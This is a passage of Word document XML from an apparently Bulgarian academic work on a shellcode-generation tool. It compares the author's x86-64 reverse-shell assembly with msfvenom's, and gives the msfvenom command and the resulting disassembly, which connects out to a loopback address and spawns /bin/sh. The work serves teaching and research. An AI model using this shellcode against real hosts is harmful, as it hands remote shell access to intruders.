      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># at this point rax could be -111 (connection refused)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># newfd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %esi, %esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_dup2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $33, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t># newfd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %esi, %esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $1, %sil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_dup2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $33, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># newfd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %esi, %esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $2, %sil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_dup2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $33, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorq %rax, %rax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb %al, sh_eol(%rip)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>leaq sh(%rip), %rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movq %rax, addr_eol(%rip)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movq %rdi, addr(%rip)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>leaq addr(%rip), %rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %edx, %edx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_execve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $59, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00C61194">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>от разработвания иснтрумент</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">С командата </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>msfvenom --platform linux -a x64 -p linux/x64/shell_reverse_tcp -f c</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> може да се генерира еквивалентът на msfvenom:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>pushq  $0x29</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>cltd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>xchg   %rax,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>movabs $0x100007fb3150002,%rcx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>push   %rcx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rsp,%rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rdx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x2a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>dec</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x21</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>jne</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>27 &lt;dup2_loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x3b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>cltd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>movabs $0x68732f6e69622f,%rbx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>push   %rbx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rsp,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>push   %rdx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>push   %rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rsp,%rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>syscall</w:t>
      </w:r>
      <w:bookmarkStart w:id="203" w:name="_f25mqrctxh38" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="203"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00C61194">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005E60F7" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">Изходът от </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00112660">
